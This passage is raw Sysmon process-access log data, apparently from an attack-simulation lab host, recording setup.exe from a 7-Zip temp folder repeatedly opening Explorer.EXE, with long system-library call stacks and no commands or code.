13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dl